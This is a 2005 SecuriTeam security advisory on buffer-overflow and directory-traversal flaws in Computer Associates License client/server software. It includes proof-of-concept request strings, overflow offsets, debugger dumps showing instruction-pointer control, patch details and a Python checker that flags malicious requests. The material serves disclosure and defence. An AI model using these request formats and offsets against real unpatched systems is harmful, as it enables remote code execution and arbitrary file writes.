[NEWS] Multiple Vulnerabilities With Computer Associates License (Multiple Buffer Overflows, Directory Traversal)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/07/05
To: list@securiteam.com Date: 7 Mar 2005 10:34:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Vulnerabilities With Computer Associates License (Multiple Buffer Overflows, Directory Traversal)
------------------------------------------------------------------------
SUMMARY
The Computer Associates License Client/Server applications (<http://www3.ca.com/>) provide a method for CA products to register their licenses on the network.
The CA License client/server contains multiple vulnerabilities.
DETAILS
Vulnerable Systems:
* CA License software v1.53 through v1.61.8.
Immune Systems:
* CA License software v1.61.9 or higher.
PUTOLF Name Buffer Overflow:
Exploitation allows remote attackers to execute arbitrary code under the
privileges of Local System (on Windows platforms) or root (on Linux
platforms).
The vulnerability specifically exists in the handling of the filename used
in PUTOLF requests.
Using a name over 252 bytes long, it is possible to overwrite the saved
instruction pointer, allowing execution of arbitrary code.
Proof Of Concept:
A0 PUTOLF 1 H A 10 name 2700 File Contents<EOM>
Invalid Command Buffer Overflow:
The vulnerability specifically exists because of insufficient bounds
checking on user-supplied values in requests with an invalid format.
When a packet containing an overly long string which is not a valid
command is received, the server uses that string to generate a log message
without checking if the buffer that the message is being stored in is
large enough. By sending a string over 2100 bytes long, it is
possible to overwrite the saved instruction pointer, allowing execution of
arbitrary code.
PUTOLF Directory Traversal:
Remote exploitation of a directory traversal vulnerability in the Computer Associates International Inc. License Client can allow attackers to create files in arbitrary locations.
The vulnerability specifically exists in the handling of the filename used
in PUTOLF requests. A PUTOLF request looks something like this:
Proof Of Concept:
A0 PUTOLF 1 H A 10 ../../../../ 2700 Test Data Goes Here<EOM>
GETCONFIG Buffer Overflow:
The vulnerability specifically exists due to insufficient bounds checking
on user-supplied values in GETCONFIG requests. Under normal operation, the
License Server will send a GETCONFIG request to connecting clients and
clients may optionally respond with a similar GETCONFIG packet. Both the
client and server software fail to check bounds on the last parameter of
the GETCONFIG packet which results in a stack overflow as shown below.
Ollydbg output after SEH overwrite in CA License Server:
EAX 00000001
ECX 7C90FB71 ntdll.7C90FB71
EDX 0000000D
EBX 00E4E053 ASCII "GETCONFIG"
ESP 00E2FC9C
EBP 00E4E050 ASCII "A0"
ESI 00E2FD18
EDI 00E4E05D ASCII "SELF"
EIP DEADC0DE
Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]
Exploitation allows remote attackers to execute arbitrary code under the
privileges of Local System. The GETCONFIG packet also contains the remote
operating system's version information, which increases the likelihood of
successful exploitation.
GCR Network Buffer Overflow:
The vulnerability specifically exists due to insufficient bounds checking
on user-supplied values in GCR requests.
Proof Of Concept:
A0 GCR HOSTNAME<DEVBOX>HARDWARE<001122334455>LOCALE<English>
IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>
OS<Windows_NT 5.0>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>
NETWORK<127.0.0.1 HOSTNAME 255.255.255.0>MACHINE<PC_1586_1_3201>
CHECKSUMS<1 2 3 4 5 6 7 8 9 10 11 12>RMTV<1.00><EOM>
If the IP address, hostname, or netmask contains a large value, the stack overflow can be triggered.
Ollydbg output after SEH overwrite in CA License Server:
EAX 00630210
ECX 7C91056D ntdll.7C91056D
EDX 003B0608
EBX 00E4E053 ASCII "GCR"
ESP 00E2FC7C ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 00E4E050 ASCII "A0"
ESI 00E2FD28 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EDI 00E4E057 ASCII "HOSTNAME<DEVBOX>HARDWARE<0011
EIP DEADC0DE
SEH chain of thread 00000DA4, item 0
Address=00E2FFA4
SE handler=58585858
Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]
Exploitation allows remote attackers to execute arbitrary code under the privileges of Local System. A GETCONFIG packet exchange which discloses the remote operating system version usually precedes the GCR request and increases the likelihood of successful exploitation.
GCR Checksum Buffer Overflow:
The vulnerability specifically exists due to insufficient bounds checking
on user-supplied values in GCR requests.
The GCR request packet format:
A0 GCR HOSTNAME<DEVBOX>HARDWARE<001122334455>LOCALE<English>
IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>
OS<Windows_NT 5.0>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>
NETWORK<127.0.0.1 HOSTNAME 255.255.255.0>MACHINE<PC_1586_1_3201>
CHECKSUMS<1 2 3 4 5 6 7 8 9 10 11 12>RMTV<1.00><EOM>
If the second, fifth, eighth, or eleventh field of the Checksums item
contains a large string, a stack overflow will occur.
The format specifier for the call to sscanf() is simply:
"%x %s %i %x %s %i %x %s %i %x %s %i"
If the eleventh field is used to overflow the local stack buffer, the
return address will be overwritten with the address at 64 bytes into the
overflow string.
Ollydbg output after SEH overwrite in CA License Client:
EAX 00630510
ECX 7C91056D ntdll.7C91056D
EDX 003B0000
EBX 00D4E053 ASCII "GCR"
ESP 0082FC10 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 00D4E050 ASCII "A0"
ESI 0082FCBC ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EDI 00D4E057 ASCII "HOSTNAME<DEVBOX>HARDWARE<0011
EIP DEADC0DE
Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]
Exploitation allows remote attackers to execute arbitrary code under the privileges of Local System. A GETCONFIG packet exchange which discloses the remote operating system version usually precedes the GCR request and increases the likelihood of successful exploitation.
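The request formats quoted in the PUTOLF, invalid-command and GCR sections above lend themselves to a simple defender-side check. The following is an added example (not code from the advisory, iDefense or CA) that parses constructed request samples and flags the length and traversal conditions the advisory describes; the 252-byte and 2100-byte limits come from the advisory, while the 64-byte cap for GCR sub-fields and the sample values are assumptions.

```python
"""Length/traversal screening for CA License requests (added example, not CA code)."""
import re

PUTOLF_NAME_MAX = 252      # from the advisory: names over 252 bytes overwrite EIP
UNKNOWN_CMD_MAX = 2100     # from the advisory: invalid commands over 2100 bytes overflow
GCR_FIELD_MAX = 64         # assumed per-field cap for NETWORK / CHECKSUMS values
KNOWN_COMMANDS = {"PUTOLF", "GETCONFIG", "GCR"}   # the commands named in the advisory

ITEM_RE = re.compile(r"([A-Z0-9]+)<([^>]*)>")      # GCR items look like KEY<value>


def check_request(msg: str) -> list:
    """Return a list of finding strings for one request; empty means nothing flagged."""
    findings = []
    body = msg[:-5] if msg.endswith("<EOM>") else msg
    parts = body.split(" ", 2)                      # "A0", command, remainder
    if len(parts) < 2:
        return ["malformed: no command"]
    cmd = parts[1]
    rest = parts[2] if len(parts) > 2 else ""
    if cmd not in KNOWN_COMMANDS:
        # unknown command strings are echoed into a log message without a bounds check
        if len(cmd) > UNKNOWN_CMD_MAX:
            findings.append("invalid command overflow: %d bytes" % len(cmd))
        return findings
    if cmd == "PUTOLF":
        # advisory format: PUTOLF 1 H A 10 <name> 2700 <file contents>
        fields = rest.split(" ", 5)
        name = fields[4] if len(fields) > 4 else ""
        if len(name) > PUTOLF_NAME_MAX:
            findings.append("PUTOLF name overflow: %d bytes" % len(name))
        if ".." in name.replace("\\", "/").split("/"):
            findings.append("PUTOLF directory traversal: %r" % name)
    elif cmd == "GCR":
        # NETWORK<ip host mask> and CHECKSUMS<12 fields> are parsed with unbounded %s
        items = dict(ITEM_RE.findall(rest))
        for key in ("NETWORK", "CHECKSUMS"):
            for i, field in enumerate(items.get(key, "").split()):
                if len(field) > GCR_FIELD_MAX:
                    findings.append("GCR %s field %d overflow: %d bytes"
                                    % (key, i + 1, len(field)))
    return findings


# constructed samples: a benign PUTOLF and the advisory's traversal request
SAMPLES = ["A0 PUTOLF 1 H A 10 name 2700 File Contents<EOM>",
           "A0 PUTOLF 1 H A 10 ../../../../ 2700 Test Data Goes Here<EOM>"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s[:40], check_request(s))
```

Field positions in the output are 1-based, so a hit on CHECKSUMS field 2, 5, 8 or 11 corresponds to one of the `%s` conversions named above.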
Vendor Status:
The vendor has released a patch:
http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp
Disclosure Timeline:
02/08/2005 Initial vendor notification
02/09/2005 Initial vendor response
03/02/2005 Coordinated public disclosure
ADDITIONAL INFORMATION
The information has been provided by idlabs (idlabs-advisories@idefense.com).
The original articles can be found at:
http://www.idefense.com/application/poi/display?id=210&type=vulnerabilities
http://www.idefense.com/application/poi/display?id=211&type=vulnerabilities
http://www.idefense.com/application/poi/display?id=212&type=vulnerabilities
http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities
http://www.idefense.com/application/poi/display?id=214&type=vulnerabilities
http://www.idefense.com/application/poi/display?id=215&type=vulnerabilities